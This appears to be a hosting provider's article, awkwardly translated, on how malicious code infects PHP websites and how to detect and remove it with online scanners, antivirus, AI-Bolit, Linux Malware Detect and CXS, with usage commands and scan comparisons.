Almost every site owner had a problem when the site suddenly starts to slow down or stops working altogether. If you have excluded a DDoS attack, changes in the code and content of the site and changes on the side of the hosting provider, it seems that the site has got viruses. Such a situation may lead to the imposition of sanctions by search engines. In this article I will tell you what viruses are, how they get on sites and how to deal with them.
Malicious code: types and principle of operation
Malicious code on websites is usually divided into two categories:
1. Exploits. They exploit software vulnerabilities to get to the site. When implemented, they perform unplanned actions – for example, they send spam. In the case of sites written in PHP, the exploit is most often the PHP code, which is almost always encrypted. Exploits on infected sites are almost always found.
2. Viruses and Trojans. These can be classic viruses for Windows and software modules for Linux. They are found on sites much less exploits. Recently, the most frequently encountered modules / programs for Linux are modules for mining.
People’s sign of system administrators: “found a virus – look for an exploit.” This is logical, as the virus somehow got on the site.
What does malicious code do on sites?
- It sends spam. Besides the fact that system resources are spent in this way, it usually does not affect the operation of the site.But the problem is that if spam starts to go from the site, email systems such as Gmail, Outlook, Yahoo! start to perceive any messages from the site as spam.
- Engaged in phishing. The code steals user data — for example, credit card numbers.This can be done by the attacker’s page that he placed on your site. This threatens to block the site at the browser level – a red page will be displayed, and no one can enter the site. Other consequences: a decrease in the ranking of the site in search results, the site is blacklisted by Google.
- Distributes viruses to the PC.
- Engaged in mining. The attacker injects code that uses the resources of the site. They are exhausted, and the site stops working.
- Participates in the botnet. The site has all the same problems as phishing or mining, but the server can also attack other sites.
How malicious code gets to the site
A typical site runs on a bunch of LAMP technologies: Linux + Apache + Mysql + PHP. According to official statistics, most often this is a CMS in PHP – WordPress or Joomla! In each of these CMS there are vulnerabilities through which malicious code can get to the site. Vulnerabilities for WordPress can be viewed on the website of the WPScan Vulnerability Database, for Joomla! – Joomla! Vulnerable Extensions List. In addition, the malicious code can be downloaded to the site by the developer or the site administrator. This happens either by negligence: for example, the administrator uses pirated versions of CMS / themes / plugins without thoroughly examining their code. Or the person does it with malicious intent: for example, the client has not paid off the developer, and the developer takes revenge.
The scale of the problem: a view from the hosting
We collected statistics on the problem of malicious code on one of our servers. Over 45 days, over 3 million files were scanned on the server during daily automatic scanning and about 5,000 exploit units were found. Among them there was not one that was a pure virus:
It may seem that 5,000 exploits on the background of more than 3 million files are few, less than 1% of infected files. But the problem is that even one exploit is enough for the site to work for an attacker. Also, according to our observations, where there appeared one file with malicious code, there will soon be more of them. Therefore, a typical infected site contains 10-20 or more files with malicious code. Before scanning the site for malicious code, you need to pay attention to the following characteristics of the scanner:
- The size of the database of malicious code signatures;
- Base update rate.
Commercial scanners, as a rule, easily give odds to most freebies. For example, the free antivirus ClamAV, whose signature base is filled with volunteers, can not be with the big players in the market. This is also because any large antivirus company has a staff of computers that are used as bait to collect fresh virus samples.
Types of scanners
We list the categories of scanners to search for malicious code on the site:
1. Online scanners: for example, Rescan.pro, Sucuri, PCrisk.
Advantages: easy to use.
Disadvantages: limited scanning capabilities and a lower percentage of detection of malicious code.
2. PHP script scanners: for example, Ai-Bolit, phpMussel.
Advantages: they can detect more viruses than online scanners, since the code is scanned in the same environment as the site.
Disadvantages: depending on the server restrictions may apply to run PHP. Therefore, conditions are possible when the script will not be able to run correctly.
3. Special site scanners / exploits: for example, LMD, or Linux Malware Detect and CXS, or ConfigServer eXploit Scanner.
Advantages: these are tools that run at the server level and are not limited to the PHP interpreter. Therefore, they can work more reliably and faster, and also find malicious code better. In addition, the commercial CXS has a heuristic scan that detects suspicious objects.
Disadvantages: poorly defined viruses. CXS relies on free ClamAV, which has a small virus signature database. In addition, both scanners are console utilities. Therefore, to use them, we need training.
These tools are very rarely used for web hosting. Ideal for using both – on a VPS or a dedicated server.
4. Hybrid or cloud scanners: for example: CloudScan.Pro.
With this scan, the site files are moved to the cloud of the company providing the service, and analyzed in it. Unfortunately, we could not find cloud scanners that could be tested for free.
5. Specialized virus scanners: for example, Comodo / Kaspersky / ClamAV. This software, which is called and considered antivirus. These programs are usually installed on most Windows PCs.
Advantages: common, well detect viruses.
Disadvantages: detect exploits very poorly.
6. File processing aggregators: for example, Virustotal. This tool aggregates file processing by various antiviruses.
Advantages: it can be used for free to scan for viruses in downloaded files.
Disadvantages: the same as in virus scanners
Some of these scanners can treat sites. But as a rule, the treatment almost always comes down to the fact that the files are quarantined. Since the site files may contain both the functional code of the site and the malicious code, the site may “break” after treatment. Therefore, we are supporters of the site being treated by a developer or a team that includes a developer. The developer knows how the site works, and can fix problems caused by moving files with a functional code to quarantine.
For beginners: online scanners and PC antiviruses
Scanning with online scanners
As an example, we took an infected site and used free or shareware programs to scan for viruses. Scanning results from Sucuri, ReScan.pro online scanners:
Despite the ease, online scanning has flaws:
- As seen in the screenshots, the online scanner does not detect all the samples of malicious code.
- Online scanners can not cure sites.
We recommend using online scanning as a rapid test. If the online scanner has found a malicious code, then you can check the site and cure it with the help of more advanced programs.
Scan using PC antivirus
To check the site using antivirus on PC:
1. Download the site code to your computer. If you can, download the site archive – viruses will not be able to damage your PC while in the archive. Most hosters have a file manager for this.
An alternative way to upload files to a PC is to use an FTP or SFTP client to connect to the server.
2. Site database dump. You can usually get a dump using the phpMyAdmin utility. It is on most hosting sites.
There are cases when the malicious code is in the database and extracted from there by the hacker script. This is rare. But despite the rarity, the base dump needs to be checked.
The results of scanning the same infected site using Windows Defender scanner:
As a rule, there are no signatures in the anti-virus databases for PCs that define the exploits used on the sites. Despite this, we recommend using PC antivirus both as a rapid test and as a means of primary treatment.
If the antivirus found a malicious code, use it to disinfect the site. After that, check the site and treat it with specialized scanners to search for exploits.
If the site is small – up to 256 MB, you can use the VirusTotal aggregator. Using it is as easy as other online scanners – you need to specify where the archive with the site and database is on the PC. In our case, the full size of the site was more than 256 MB. Therefore, we checked his files selectively. As can be seen in the screenshot, Virustotal used 58 antivirus programs for stationary PCs. As a result, only 19 of 58 antiviruses detected malicious code in the archive.
For advanced users: scanners-PHP scripts and specialized software scanners
To use these scanners, you need technical knowledge, ability to work with the Linux command line and installed programs / tools. If you don’t have them, you can be helped by site developers, system administrators, hosting technical support or scanning tool providers.
The most universal option is to download the site code and its database to a local PC and scan it with available means. In this case, you can install and use any software without regard to the hosting / server hosting the site. It is assumed that on the computer on which files will be scanned after downloading, it is worth Linux OS. In the case of scanning on the hosting / server side, the procedure is the same – only the hosting / server needs to be connected via SSH.
Scanners – PHP Scripts
In order to scan files with script scanners, you need a PHP interpreter and the ability to run PHP scripts from the command line. You can use PHP-based scanners in all operating systems that support PHP: Linux / Mac / Windows and others.
Theoretically, script scanners can be run on a server with a website. Practically often there are restrictions:
- Not all hosters provide SSH access.
- On the hosting there may be restrictions on the execution time of PHP scripts. Therefore, the scan can last forever.
For example, we tested the conditionally free scanner AI-Bolit.
To scan the site, you need:
- Download the archive with the scanner and unpack the ai-bolit subdirectory in the root directory of the site – on a local PC or hosting.
- In the command line, go to the directory where AI-Bolit was unpacked and execute one of the commands:
For express scan: $ php ai-bolit.php –mode = 1
Paranoid treatment for treatment: $ php ai-bolit.php –mode = 2
The scanner displays a brief report on the scan results on the command line and a complete HTML document:
Unlike online scanners, script scanners are full-fledged tools that can thoroughly scan a site. Often this is the only available tool with which you can scan a website on a hosting.
Specialized software scanners
As root, you need to run the following commands:
- # cd ~
- wget – download the latest version in the current directory;
- tar -xvf maldetect-current.tar.gz – unpack the archive;
- ls -d * / | grep maldetect – find out the name of the directory with the newly unpacked version;
- cd maldetect-1.6.2 – go to the directory;
- # ./install.sh – start the installation;
After installation, you can run the following commands:
- # maldet -a / path / to / files – scan the directory where the site is located;
- /path / to / files — location of files of the site to be scanned;
- # maldet –report 180731-2020.1148 – view the scan report. The report name is in the command output of the previous command.
- # maldet –q 180731-2020.1148 – move all files from the report to quarantine.
Scan results for an infected site:
For comparison: commercial CXS scan results:
The results of scanning the experimental site with three scanners:
- AI-Bolit: 184 malicious scripts;
- maldet / LMD: 57 malware hits;
- CXS: 65 fingerprints + 10 Viruses.
The number of objects detected in reports varies because scanners use different signature bases, terminology and methods for calculating objects with malicious code. For example, AI-Bolit considers PHP scripts as malicious scripts, including doorway pages, although they do not contain malicious code. And maldet / LMD and CXS are not.
What to do after scanning the site
After you have detected the malicious code and, possibly, transferred it to quarantine, you need to think about treating the site.
One of the most reliable ways: restore all files that contained malicious code from the archive made before the site was infected. This is a good option only if you are sure that after creating the archive, no changes were made to the site files.
After testing, we saw that none of the tools could guarantee and automatically restore the site to the state it was in before hacking. Therefore, only cooperation with the developer, restoration of files and database contents from backup copies can give you some guarantees. Also at the stage of treatment, site developers must find out how malicious code got on the site. Some tools may help with vulnerability information. For example, the AI-Bolit utility reports known vulnerabilities in a narrow spectrum of software known to it. CXS provides information on all outdated software versions known to it.
After you have removed the malicious code from the site, take precautions:
1. Update passwords for all accounts on the site. The intruder had access to him and he could keep himself a loophole.
2. Regularly and promptly update CMS and plugins to prevent hacking.
In our experience with a recent vulnerability in CMS Drupal, the first signs of malicious code on sites were recorded 36-48 hours after the vulnerability was published and how to fix it – updating CMS to the latest version. If our clients, who were hacked, updated CMS, there would be no problems.
3. Regularly monitor the site.
4. Backup regularly.
There is no perfect product that would be free, convenient, would find all the samples of malicious code, treat the site and work on all servers. But if you use a combination of several items – use a scanner, regularly create backup copies and update CMS, – you can solve almost all the problems with malicious code on the site.
To detect malicious code on a site, you must scan the site’s files and database using one or more tools:
- antivirus (or Virustotal aggregator);
- specialized scanners (Ai-Bolit, Linux Malware Detect, ConfigServer eXploit Scanner).
For express scanning, you can use online scanners (Rescan.pro, Sucuri, PCrisk). After the restoration of the site (in case of infection) – find a way how the malicious code hit the site and, if the reason is in outdated CMS and plugins, – update them.